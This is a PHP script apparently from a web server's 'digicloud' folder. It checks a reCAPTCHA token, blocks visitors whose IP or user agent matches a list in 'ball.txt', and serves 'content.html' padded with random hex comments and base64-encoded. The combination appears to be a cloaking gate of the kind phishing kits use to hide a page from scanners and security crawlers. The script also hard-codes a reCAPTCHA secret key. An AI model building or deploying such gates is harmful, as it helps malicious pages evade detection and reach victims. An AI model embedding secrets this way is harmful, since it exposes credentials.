/home/sweetnotes/www/digicloud/getcontent.php
<?php
ini_set('display_errors', 1);
error_reporting(E_ALL);
if (empty($_GET['token'])) {
http_response_code(400);
exit('Missing CAPTCHA token.');
}
$token = $_GET['token'];
$secretKey = '6Lfgkm0sAAAAAK8r9CfcHDVohFzI9FiIJ3K9x8FI';
$verifyResp = false;
if (function_exists('curl_init')) {
$ch = curl_init('https://www.google.com/recaptcha/api/siteverify');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
'secret' => $secretKey,
'response' => $token,
'remoteip' => $_SERVER['REMOTE_ADDR'],
]);
$verifyResp = curl_exec($ch);
if (curl_errno($ch)) {
error_log('cURL error (reCAPTCHA): '.curl_error($ch));
$verifyResp = false;
}
curl_close($ch);
}
if (!$verifyResp && ini_get('allow_url_fopen')) {
$verifyUrl = 'https://www.google.com/recaptcha/api/siteverify'
. '?secret=' . urlencode($secretKey)
. '&response=' . urlencode($token)
. '&remoteip=' . urlencode($_SERVER['REMOTE_ADDR']);
$verifyResp = @file_get_contents($verifyUrl);
}
if (!$verifyResp) {
http_response_code(500);
exit('CAPTCHA verification unavailable.');
}
$data = json_decode($verifyResp, true);
if (empty($data['success'])) {
http_response_code(403);
exit('CAPTCHA verification failed.');
}
$blockedEntries = @file('ball.txt', FILE_IGNORE_NEW_LINES|FILE_SKIP_EMPTY_LINES) ?: [];
$visitorIp = $_SERVER['REMOTE_ADDR'] ?? '';
$visitorUA = $_SERVER['HTTP_USER_AGENT'] ?? '';
foreach ($blockedEntries as $entry) {
$e = trim($entry);
if ($e !== '' && (strpos($visitorIp, $e)!==false || strpos($visitorUA, $e)!==false)) {
http_response_code(403);
exit('Access Denied.');
}
}
$html = @file_get_contents('content.html');
if ($html === false) {
$html = '<p>Error: Unable to load content.</p>';
}
$pre = '<!-- '.bin2hex(random_bytes(1300)).' -->';
$post = '<!-- '.bin2hex(random_bytes(1100)).' -->';
$payload = $pre . $html . $post;
header('Content-Type: text/plain');
echo trim(base64_encode($payload));